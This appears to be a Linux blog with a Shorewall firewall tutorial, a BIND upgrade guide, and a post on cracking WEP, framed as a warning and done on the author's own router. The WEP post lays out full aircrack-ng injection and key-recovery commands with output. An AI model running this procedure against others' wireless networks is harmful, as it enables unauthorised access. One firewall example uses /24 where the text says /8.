Aug 10 17:01:44 wishmacer.loc logger[2279]: Shorewall started
Aug 10 17:01:44 wishmacer.loc shorewall[2069]: done.
Aug 10 17:01:44 wishmacer.loc systemd[1]: Started Shorewall IPv4 firewall.

8) Check whether it is working as expected (optional) by scanning it from another machine with nmap. wishmacer uses the IP 192.168.0.100 and I am scanning it from another local machine, icsserver, which uses 192.168.0.1:

Hint: You will be able to see the ETA if You press space during the scan.

date && nmap -p 0-65535 192.168.0.100 && date

Sat Aug 10 17:14:00 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:14 IST
Stats: 0:10:22 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 46.31% done; ETC: 17:36 (0:11:46 remaining)
Stats: 0:21:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.43% done; ETC: 17:36 (0:00:34 remaining)
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
All 65536 scanned ports on 192.168.0.100 are filtered
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 1327.34 seconds
Sat Aug 10 17:36:07 IST 2013

It took roughly 22 minutes to scan all 65536 ports (dropped probes have to time out, which is why it is so much slower than the 16 seconds before). nmap reports all of them as filtered, i.e. the firewall drops the probes without answering.

9) Add Your custom rules. For example, on wishmacer / 192.168.0.100 I have a service running on TCP port 50505 and I want to open it.

Modify this file:

/etc/shorewall/rules

by adding those 2 lines:

ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
?SECTION ALL
?SECTION ESTABLISHED
?SECTION RELATED
?SECTION INVALID
?SECTION UNTRACKED
?SECTION NEW
# Allow access to port 50505 TCP - SSHD
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

and restart Your firewall using this command:

systemctl restart shorewall

and test if it worked from a different machine:

date && nmap -p 7634 192.168.0.100 && date

Sat Aug 10 17:48:25 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00016s latency).
PORT STATE SERVICE
7634/tcp filtered hddtemp
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds
Sat Aug 10 17:48:38 IST 2013

date && nmap -p 50505 192.168.0.100 && date

Sat Aug 10 17:48:45 IST 2013

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-10 17:48 IST
Nmap scan report for 192.168.0.100
Host is up (0.00019s latency).
PORT STATE SERVICE
50505/tcp open unknown
MAC Address: 00:0A:E4:F6:D4:8F (Wistron)

Nmap done: 1 IP address (1 host up) scanned in 13.25 seconds
Sat Aug 10 17:48:59 IST 2013

As You can see port 7634 which was previously (before shorewall configuration / start) open is now marked as filtered and the 50505 which I chose to open on my firewall is now open and ready to use.

Now You can add more lines in this configuration file. Different ports, different protocols, different rules.

For example, if You want to open UDP port 123, add this line:

ACCEPT net fw udp 123 -

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

And what if I want to open a large range of ports? Let’s say… TCP ports 5000 through 5250?

No problem – add another rule that looks like this:

ACCEPT net fw tcp 5000:5250 -

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

Ok Andy… I have a problem… I cannot ping the machine anymore after the shorewall was started…

Ok… I am guessing You want the machine to respond to ping for whatever the reason.

Add this as a rule:

Ping(ACCEPT) net fw

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

If You want to block a pest (let’s assume IP 1.2.3.4) that is messing with Your server, add this line:

DROP net:1.2.3.4 all

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

If the pest is using a dynamic IP and You know the range (let’s assume it can be anywhere in 2.*.*.*), then add this line:

DROP net:2.0.0.0/8 all

(a /8 covers the whole 2.*.*.* block; a /24 would only cover 2.0.0.0-2.0.0.255)

so it looks like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/8 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE

save the file and restart firewall as You did before.

It’s very important that You place the DROP lines before the ACCEPT lines: rules within a section are matched top to bottom and the first match wins, so an ACCEPT placed above the DROP would let the pest through.
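Because that ordering mistake compiles without complaint, here is a small lint for the rules file as an added example (not code from the post or from Shorewall): it reports any DROP/REJECT that comes after an ACCEPT in the NEW section, lists which ports the file opens from net to the firewall, and applies the file only after “shorewall check” has compiled it cleanly (so a typo does not leave You without a firewall, or locked out of a remote box). The sample rules text is constructed from the examples above.

```shell
#!/bin/sh
# Added example, not code from the post or from Shorewall: lint
# /etc/shorewall/rules for the ordering mistake the post warns about,
# list the ports it opens towards the firewall, and apply it only if
# "shorewall check" compiles it. SAMPLE_RULES is constructed from the
# page's examples, with the DROP deliberately in the wrong place.

SAMPLE_RULES='#ACTION SOURCE DEST PROTO DEST
?SECTION NEW
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
DROP net:1.2.3.4 all
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
#LAST LINE -- DO NOT REMOVE'

# Keep only the rules of the NEW section (a file without SECTION lines
# is all NEW), dropping comments and blank lines.
new_section() {
    awk '
        BEGIN { insec = 1 }
        /^[?]?SECTION[ \t]/ { insec = ($2 == "NEW"); next }
        /^[ \t]*#/ || /^[ \t]*$/ { next }
        insec { print }'
}

# Report every DROP/REJECT that follows an ACCEPT (plain or Ping(ACCEPT)
# style action) in the NEW section; rule numbers count from the start of
# that section. Returns 1 if anything was reported.
check_order() {
    new_section | awk '
        $1 == "ACCEPT" || $1 ~ /\(ACCEPT\)$/ { last_accept = NR }
        ($1 == "DROP" || $1 == "REJECT") && last_accept {
            printf "rule %d: %s comes after an ACCEPT at rule %d\n", NR, $0, last_accept
            bad = 1
        }
        END { exit bad }'
}

# List "proto port(s)" pairs the file opens from net to fw.
opened_ports() {
    new_section | awk '$1 == "ACCEPT" && $2 == "net" && $3 == "fw" { print $4, $5 }'
}

# Apply the live config: compile-check first, restart only on success.
apply_rules() {
    check_order < /etc/shorewall/rules || return 1
    shorewall check || { echo "shorewall check failed; not restarting" >&2; return 1; }
    systemctl restart shorewall
}

# Demo on the constructed sample:
printf '%s\n' "$SAMPLE_RULES" | check_order
printf '%s\n' "$SAMPLE_RULES" | opened_ports
```

Run apply_rules as root instead of a bare systemctl restart; when editing a remote firewall, Shorewall's own “shorewall safe-restart” (which reverts unless You confirm within a timeout) is the other safety net worth knowing.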

If You want to forward a port (destination nat) to another IP / machine add a rule that will do it for You. Example:

I have 2 NICs in my machine.

– The first has IP 192.168.1.50 and is defined as the wan zone.
– The second has IP 192.168.0.1 and is recognized by shorewall as the net zone.

For these rules to compile, the wan zone has to exist: it needs its own entry in /etc/shorewall/zones and /etc/shorewall/interfaces (and a policy line), just like net above. The net zone machine also has to use the firewall as its default gateway, so that the replies come back through it.

There is another machine in my net zone. The machine’s IP is 192.168.0.100.

I want to forward port 4000 (both TCP and UDP) from the wan zone – IP 192.168.1.50 – to port 4000 on the net zone machine with the IP 192.168.0.100. This means that if any packet lands on port 4000 of the 192.168.1.50 machine it will be redirected (forwarded / DNATed) to port 4000 on the 192.168.0.100 machine.

The rule will look like this:

DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL RATE USER/ MARK CONNLIMIT TIME HEADERS SWITCH HELPER
# PORT PORT(S) DEST LIMIT GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/8 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
ACCEPT net fw tcp 50505 -
DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100 udp 4000 - 192.168.1.50
#LAST LINE -- DO NOT REMOVE

save the file and restart the firewall as You did before. Make sure that port 4000 (both TCP and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 4000 192.168.0.100 && nmap -sU -Pn -p 4000 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
4000/tcp open remoteanything

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
4000/udp open|filtered icq

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

Two things to keep in mind here. A UDP port shows up as open|filtered whenever nmap gets no reply at all, which is the normal case for a service that only answers well-formed requests, so open|filtered does not prove that anything is listening. And this scan only checks the target machine itself: to confirm the forwarding, scan port 4000 on 192.168.1.50 from a machine in the wan zone, not from the firewall.

The situation looks slightly different when the port You publish on the wan side and the port the service listens on inside the net zone are not the same. The scenario described above still applies: 2 NICs, wan and net zones, another machine in the net zone.

I want to forward port 6118 (both TCP and UDP) from the wan zone (IP 192.168.1.50) to port 6112 on the net zone machine with the IP 192.168.0.100. This means that any packet that lands on port 6118 of the 192.168.1.50 machine will be redirected (forwarded / DNATed) to port 6112 on the 192.168.0.100 machine.

The rule will look like this (the port the service actually listens on goes after the address in the DEST column, while DEST PORT stays the port the packet arrived on):

DNAT wan net:192.168.0.100:6112 tcp 6118 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 - 192.168.1.50

and the rules file will look like this:

#
# Shorewall version 4 - Rules File
#
# For information on the settings in this file, type "man shorewall-rules"
#
# The manpage is also online at
# http://www.shorewall.net/manpages/shorewall-rules.html
#
##################################
#ACTION        SOURCE          DEST                    PROTO  DEST       SOURCE   ORIGINAL      RATE   USER/  MARK  CONNLIMIT  TIME  HEADERS  SWITCH  HELPER
#                                                             PORT       PORT(S)  DEST          LIMIT  GROUP
#SECTION ALL
#SECTION ESTABLISHED
#SECTION RELATED
#SECTION INVALID
#SECTION UNTRACKED
SECTION NEW
DROP           net:1.2.3.4     all
DROP           net:2.0.0.0/24  all
Ping(ACCEPT)   net             fw
ACCEPT         net             fw                      udp    123        -
ACCEPT         net             fw                      tcp    5000:5250  -
ACCEPT         net             fw                      tcp    50505      -
DNAT           wan             net:192.168.0.100       tcp    4000       -        192.168.1.50
DNAT           wan             net:192.168.0.100       udp    4000       -        192.168.1.50
DNAT           wan             net:192.168.0.100:6112  tcp    6118       -        192.168.1.50
DNAT           wan             net:192.168.0.100:6112  udp    6118       -        192.168.1.50
#LAST LINE -- DO NOT REMOVE

save the file and restart the firewall as You did before. Make sure that port 6112 (both TCP and UDP) is open on the 192.168.0.100 machine. How?

su -c "nmap -Pn -p 6112 192.168.0.100 && nmap -sU -Pn -p 6112 192.168.0.100"

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up (0.00012s latency).
PORT STATE SERVICE
6112/tcp open dtspc

Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds

Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-09 18:43 GMT
Nmap scan report for wishmasus.loc (192.168.0.100)
Host is up.
PORT STATE SERVICE
6112/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 2.13 seconds

That’s it – You have just configured shorewall to Your liking.

Hint: Think of a firewall as of a naughty kid: if You allow him to do something and then deny it, You know he will still do it... In other words, the order of the rules / policies does matter: the first rule that matches a packet wins. Deny first and ask questions later ;).

Hint: If You are forwarding a port from machine 1 to machine 2 there is no need to open the port on machine 1 separately; the DNAT rule takes care of that (it both rewrites the destination and accepts the forwarded traffic). You do however need to make sure that the port is open on machine 2. If it is not, check that the application that is supposed to listen on it is running, and if You are running shorewall on machine 2 as well, make sure the appropriate ACCEPT rule was added to machine 2's rules file.

Hint: Do not scan the ports from the same machine that You have configured the firewall on. Traffic to the machine's own address goes over the loopback interface, which shorewall does not filter, so such a scan will show ports as open that are blocked for everybody else.

Hint: IF You will run into a problem during the setup and firewall won’t start or restart use this command:

journalctl -xn

and read its output thoroughly. The answer to Your trouble is there.

Hint: If You want to test if shorewall is causing You trouble (blocks some port that You want to connect to) run:

systemctl stop shorewall && shorewall clear

This will stop the firewall and clear all its rules. Stopping alone is not enough for this test: a stopped shorewall still blocks everything except the traffic allowed in its stopped state, which is why the clear is there. If You still cannot connect to the port on Your machine after this and nmap still says filtered or closed, look for the reason somewhere else... Remember to start shorewall again when You are done, because a cleared firewall lets everything through.
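A small lint for the rules file, added here as an example; it is not Shorewall's code and not part of the original post. It ties together two points from above: that DROP lines must come before ACCEPT lines (the first matching rule wins), and that the DEST column of a DNAT rule is zone:address with an optional :port, which defaults to the DEST PORT when left out. The rules it checks are the ones from this post plus one deliberately misplaced DROP (a constructed sample, SAMPLE_RULES); it only handles the first seven columns and IPv4 addresses.

```python
"""Lint a Shorewall 4 rules file: flag DROP/REJECT rules that sit below an
ACCEPT (first match wins, so they may never see the traffic), and spell out
what each DNAT rule does, including the optional :port in the DEST column.

Added example for this post; not part of Shorewall and not the author's code.
COLUMNS follows shorewall-rules(5); only the first seven columns are handled
because the file in the post uses no others."""
import re
from typing import List

COLUMNS = ("action", "source", "dest", "proto", "dport", "sport", "origdest")

# Constructed sample: the post's rules plus one misplaced DROP at the end.
SAMPLE_RULES = """\
#ACTION SOURCE DEST PROTO DEST SOURCE ORIGINAL
SECTION NEW
DROP net:1.2.3.4 all
DROP net:2.0.0.0/24 all
Ping(ACCEPT) net fw
ACCEPT net fw udp 123 -
ACCEPT net fw tcp 5000:5250 -
DNAT wan net:192.168.0.100 tcp 4000 - 192.168.1.50
DNAT wan net:192.168.0.100:6112 udp 6118 - 192.168.1.50
DROP net:3.3.3.3 all
"""


def parse_rules(text: str) -> List[dict]:
    """One dict per rule line; comments, blanks and SECTION lines are skipped.
    A missing column or a '-' placeholder is stored as None."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop trailing comments
        if not line or line.startswith("SECTION"):
            continue
        fields = line.split()
        rule = {"line": lineno}
        for name, value in zip(COLUMNS, fields + [None] * len(COLUMNS)):
            rule[name] = None if value in (None, "-") else value
        rules.append(rule)
    return rules


def effective_action(action: str) -> str:
    """'Ping(ACCEPT)' is the Ping macro invoked with ACCEPT: treat it as ACCEPT."""
    m = re.fullmatch(r"\w+\((\w+)\)", action)
    return m.group(1) if m else action


def check_order(rules: List[dict]) -> List[str]:
    """Shorewall evaluates rules top to bottom and the first match wins, which
    is why the post says to put DROP lines before ACCEPT lines."""
    problems = []
    first_accept = None
    for r in rules:
        act = effective_action(r["action"])
        if act in ("ACCEPT", "DNAT"):
            if first_accept is None:
                first_accept = r["line"]
        elif act in ("DROP", "REJECT") and first_accept is not None:
            problems.append(
                f"line {r['line']}: {act} {r['source']} comes after the ACCEPT "
                f"on line {first_accept}; move it up or it may never match")
    return problems


def dnat_mappings(rules: List[dict]) -> List[dict]:
    """Expand each DNAT rule. DEST is zone:address[:port]; when :port is
    absent the new port is the same as DEST PORT (the 4000 -> 4000 case)."""
    mappings = []
    for r in rules:
        if effective_action(r["action"]) != "DNAT":
            continue
        zone, _, rest = r["dest"].partition(":")
        new_ip, _, new_port = rest.partition(":")   # IPv4 only: a ':' here is a port
        mappings.append({
            "from_zone": r["source"],
            "orig_dest": r["origdest"] or "any address of the firewall",
            "proto": r["proto"],
            "dport": r["dport"],
            "to_zone": zone,
            "to_ip": new_ip,
            "to_port": new_port or r["dport"],
        })
    return mappings


def lint(text: str):
    rules = parse_rules(text)
    return check_order(rules), dnat_mappings(rules)


if __name__ == "__main__":
    problems, mappings = lint(SAMPLE_RULES)
    for p in problems:
        print("WARNING:", p)
    for m in mappings:
        print(f"{m['from_zone']} -> {m['orig_dest']}:{m['dport']}/{m['proto']} "
              f"is DNATed to {m['to_ip']}:{m['to_port']} ({m['to_zone']} zone)")
```

Run as a script it prints the warning for the misplaced DROP and the two expanded DNAT mappings; to lint the real file, pass the contents of /etc/shorewall/rules to lint() instead of the sample.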

Regards.

Andrzej

P.S. Breaking news… Someone actually reads this… This post has been translated (not very exactly I must say) to Polish by Wilczek. You can find it here.

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP TO SECURE YOUR ROUTER!

I have noticed (while connecting to my own AP) that many people around still use WEP encryption and I just felt dizzy… After I have counted to 10 I have decided to write this up:

Cracking WEP by AndrzejL aka one of the reasons why You SHOULD NEVER USE WEP to secure Your router!

This is NOT a “HOW TO CRACK WEP” tutorial. This is a warning. Warning that should be taken as “WOW! This WEP stuff is really not secure… I better change my router to personal WPA2 right away…”. Please do not use this knowledge to do illegal stuff. I used my own wireless router in my own wireless network for this demonstration. Breaking into WEP secured networks is illegal. You have been warned.

0) Install aircrack-ng-svn from ArchLinux AUR repository:

FIRST WINDOW:

1) Check the name of the wireless interface

iwconfig

says it’s wlan0

2) Check mac address of wlan0

ifconfig wlan0

says YY:YY:YY:YY:YY:YY

3) Optional – not necessary under Backtrack. Kill unnecessary network services that can mess You up:

airmon-ng check kill

Example:

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
23899   ifplugd
Killing all those processes…

4) Create wireless interface in monitor mode:

airmon-ng start wlan0

5) Check the name of the wireless monitor mode interface

iwconfig

says it’s mon0

6) Start sniffing to collect router’s data

airodump-ng mon0

Stop airodump with CTRL + C

Information gathered:

Router’s BSSID: XX:XX:XX:XX:XX:XX
Router’s ESSID: Arch_Linux_User

    INFO: If the ESSID contains spaces, put it in double or single quotes in the next commands, i.e. “Arch Linux User” or ‘Arch Linux User’.

Router’s CHANNEL: ZZ

7) Kill mon0 interface:

airmon-ng stop mon0

8) Start mon0 fixed at the AP’s channel:

airmon-ng start wlan0 ZZ

9) Now re-write Your sniffing command so it sniffs the right channel / bssid and so it saves the captured packets into a file:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX -w ./output mon0

    IF You get “Fixed channel mon0: -1” in the top right corner of the sniffer, rewrite Your command by adding --ignore-negative-one so it looks like this:

airodump-ng -c ZZ --bssid XX:XX:XX:XX:XX:XX  --ignore-negative-one -w ./output mon0

    Leave this command running and saving packets.

SECOND WINDOW:

10) Check if the card is capable of packet injection:

aireplay-ng -9 mon0

    16:10:47  Injection is working!

11) Try to auth with router:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    if You get this error:

16:20:36 Waiting for beacon frame (XX:XX:XX:XX:XX:XX) on channel -1
15:38:33  Couldn’t determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch.

    just rewrite Your command by adding the “--ignore-negative-one” switch.

Example:

aireplay-ng -1 0 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

This command will (should) authenticate You with the router and then give You the prompt back.

0 – the delay in seconds between re-association attempts: 0 authenticates once and returns, any other value keeps re-authenticating every that many seconds (try values between 1 and 512)
-e router’s ESSID
-a router’s BSSID
-h Your card’s MAC address
--ignore-negative-one fixes the above mentioned error

IF You want to stop this command use CTRL + C

16:16:28  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1

16:16:28  Sending Authentication Request (Open System) [ACK]
16:16:28  Authentication successful
16:16:28  Sending Association Request [ACK]
16:16:28  Association successful 🙂 (AID: 1)

🙂 now fiddle with the “0” in the command – change its value to something between 1 and 512.

Example:

aireplay-ng -1 1 -e Arch_Linux_User -a XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

    Leave this command running.

THIRD WINDOW:

12) Start to inject:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY mon0

    If You get these errors:

16:21:36  Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel -1
16:21:36  Couldn’t determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).

    rewrite the command by adding the “-e Arch_Linux_User” and “--ignore-negative-one” switches.

Example:

aireplay-ng -3 -e Arch_Linux_User -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY --ignore-negative-one mon0

Meanwhile You can (but You do not have to) fiddle with the aireplay-ng “-1” command in the second window. Change the value of “0” to different values between 1 and 512 and see which works better for You... Sometimes 1 will do juuuust fine.

    After a while You _should_ receive ARP request packets... and aireplay-ng will START TO INJECT THEM.

FOURTH WINDOW:

13) When You have collected some ARP packets (watch the #Data column in the airodump-ng window grow) You can start the cracking process:

aircrack-ng -z ./output*.cap

and soon after that You should be able to see this sort of message:

KEY FOUND! [ 2C:BD:3D:AC:D5:97:59:57:28:CE:3C:B9:F5 ]
Decrypted correctly: 100%

That’s it… You’re all done…

It takes less than 5 minutes to crack a WEP key... 5 minutes guys and girls... and Your wireless network has been compromised... Now please tell me that You have changed the default administrator’s password for the router? Please please tell me You did at least that...
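To see which networks around You, Your own included, are still on WEP or wide open, the CSV that airodump-ng writes next to its capture (with -w ./output that is ./output-01.csv) is enough. The script below is an added example, not the author's and not part of the aircrack-ng suite, that reads such a file and lists the offenders. SAMPLE_CSV is constructed here after the layout airodump-ng uses: the access-point table, a blank line, then the station table; WEP and OPN are what airodump-ng prints in the Privacy column for WEP and open networks.

```python
"""Audit an airodump-ng CSV dump for access points that still use WEP, or no
encryption at all, so they can be moved to WPA2.

Added example for this post; not part of aircrack-ng and not the author's
code. SAMPLE_CSV is a constructed file following airodump-ng's CSV layout:
an access-point table, a blank line, then a station table we do not need."""
import csv
import io
from typing import Dict, List

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
XX:XX:XX:XX:XX:XX, 2014-12-09 18:40:01, 2014-12-09 18:45:10,  6,  54, WEP , WEP, , -41,  310, 41233,   0.  0.  0.  0,  15, Arch_Linux_User,
AA:BB:CC:DD:EE:01, 2014-12-09 18:40:03, 2014-12-09 18:45:09, 11,  54, WPA2, CCMP, PSK, -67,  290,     0,   0.  0.  0.  0,   8, HomeNet1,
AA:BB:CC:DD:EE:02, 2014-12-09 18:40:05, 2014-12-09 18:45:08,  1,  54, OPN , , , -80,  120,     0,   0.  0.  0.  0,   6, Cafe01,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
YY:YY:YY:YY:YY:YY, 2014-12-09 18:41:00, 2014-12-09 18:45:10, -30,     4981, XX:XX:XX:XX:XX:XX,
"""


def parse_access_points(text: str) -> List[Dict[str, str]]:
    """Return one dict per access point, keyed by the CSV header names."""
    ap_table = text.split("\n\n", 1)[0]            # everything before the station table
    reader = csv.reader(io.StringIO(ap_table), skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    aps = []
    for row in reader:
        if len(row) < len(header):                  # stray short line, ignore
            continue
        aps.append({h: v.strip() for h, v in zip(header, row)})
    return aps


def weak_access_points(aps: List[Dict[str, str]]) -> List[dict]:
    """Pick out WEP and open networks. Sorted by captured IVs: the more IVs
    anyone listening already has, the sooner aircrack-ng hands them the key."""
    findings = []
    for ap in aps:
        privacy = ap.get("Privacy", "")
        if privacy.startswith("WEP"):
            problem = "WEP"
        elif privacy == "OPN":
            problem = "open"
        else:
            continue                                 # WPA/WPA2: not this post's problem
        findings.append({
            "essid": ap.get("ESSID", ""),
            "bssid": ap["BSSID"],
            "channel": ap["channel"],
            "problem": problem,
            "ivs": int(ap.get("# IV") or 0),
        })
    findings.sort(key=lambda f: f["ivs"], reverse=True)
    return findings


def audit(text: str) -> List[dict]:
    return weak_access_points(parse_access_points(text))


if __name__ == "__main__":
    for f in audit(SAMPLE_CSV):
        print(f"{f['essid']!r} ({f['bssid']}, ch {f['channel']}): {f['problem']}, "
              f"{f['ivs']} IVs already captured")
```

To audit a real capture, read ./output-01.csv into a string and pass it to audit(); anything it lists is a network whose owner should be switching to WPA2 today.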

Cheers.

AndrzejL

[PCLinuxOS] Manually upgrading Bind / Named to version 9.9.2-P2 [Security patches].

Hi folks.

Latest Bind / Named version was released several days ago to patch this vulnerability.

I will try to show how to download, extract, configure and install the latest version.

Open terminal window and follow this set of instructions:

su

root's password

export PREFIX=/usr

export PATH=$PREFIX/bin:$PATH

export PKG_CONFIG_PATH=$PREFIX/lib/pkgconfig:$PREFIX/share/pkgconfig

cd /opt/

mkdir Bind

cd Bind

wget -c ftp://ftp.isc.org/isc/bind9/9.9.2-P2/bind-9.9.2-P2.tar.gz

ISC publishes a detached PGP signature (a .asc file) next to every tarball. Verify the download against it with ISC's signing key before unpacking anything; without that check You are trusting whatever the FTP mirror handed You, and You are about to install and run the result as root.

tar xvzf ./bind-9.9.2-P2.tar.gz

cd bind-9.9.2-P2

./configure --prefix=$PREFIX --sysconfdir=/etc/

You can expect missing dependencies here. I had no problems whatsoever as I have a good few “devel” packages installed. If You do run into a snag, figure out what You are missing, install it from Synaptic (without closing this window) and re-run the above configure step till there are no errors.

make

make install

ls --full-time /var/lib/named/var/

one of the listed items should look like this:

drwxr-xr-x 7 root root 4096 2013-03-22 09:08:02.163308440 +0100 named/

the install left the directory owned by root, so hand it back to the named user:

chown named:named /var/lib/named/var/named/

ls --full-time /var/lib/named/var/

and the same entry should now read:

drwxr-xr-x 7 named named 4096 2013-03-22 09:08:08.221303100 +0100 named/

Now in this terminal window type in

named -v

the reply should look like this:

BIND 9.9.2-P2

service named restart

and the reply should look something like this:

Stopping named: [ Failed ]
Starting named: [ OK ]

